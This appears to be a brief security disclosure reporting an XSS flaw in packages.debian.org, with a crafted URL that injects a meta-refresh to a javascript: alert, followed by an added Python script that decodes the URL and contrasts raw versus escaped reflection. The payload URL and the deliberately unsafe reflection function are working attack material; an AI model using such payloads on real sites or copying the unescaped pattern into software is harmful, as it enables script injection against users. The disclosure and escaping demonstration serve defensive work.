XSS in updated packages.debian.org
Hi,
there's an XSS issue in the updated p.d.o:
http://packages.debian.org/content%3D0%3Bjavascript%3Aalert%280%29%3E/http-equiv%3Drefresh/%3Cmeta
The '0' which is output could be replaced by encoded text or arbitrary
JavaScript instructions.
Moritz
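An added example, not part of the original message and not packages.debian.org code: it percent-decodes the path segments of the URL reported above, flags the ones that carry HTML-significant characters, and shows the same segments echoed raw and HTML-escaped. The message does not say where the site echoes the path, so the "No such page" template and all function names are hypothetical.

```python
import html
from urllib.parse import urlsplit, unquote

# URL quoted in the report above.
REPORTED_URL = (
    "http://packages.debian.org/content%3D0%3Bjavascript%3Aalert%280%29%3E"
    "/http-equiv%3Drefresh/%3Cmeta"
)

# Characters that change meaning when placed into HTML text or attributes.
MARKUP_CHARS = set("<>\"'&")


def decoded_segments(url):
    """Split the path on '/' first, then percent-decode each segment."""
    path = urlsplit(url).path
    return [unquote(seg) for seg in path.split("/") if seg]


def suspicious_segments(url):
    """Decoded segments that contain HTML-significant characters."""
    return [s for s in decoded_segments(url) if MARKUP_CHARS & set(s)]


def reflect_unsafe(segments):
    # Hypothetical vulnerable pattern: decoded input pasted into markup as-is.
    return "<p>No such page: " + " ".join(segments) + "</p>"


def reflect_safe(segments):
    # Same template, but every segment is escaped and renders as inert text.
    escaped = (html.escape(s, quote=True) for s in segments)
    return "<p>No such page: " + " ".join(escaped) + "</p>"


if __name__ == "__main__":
    segs = decoded_segments(REPORTED_URL)
    print("decoded:   ", segs)
    print("suspicious:", suspicious_segments(REPORTED_URL))
    print("unsafe:    ", reflect_unsafe(segs))
    print("safe:      ", reflect_safe(segs))
```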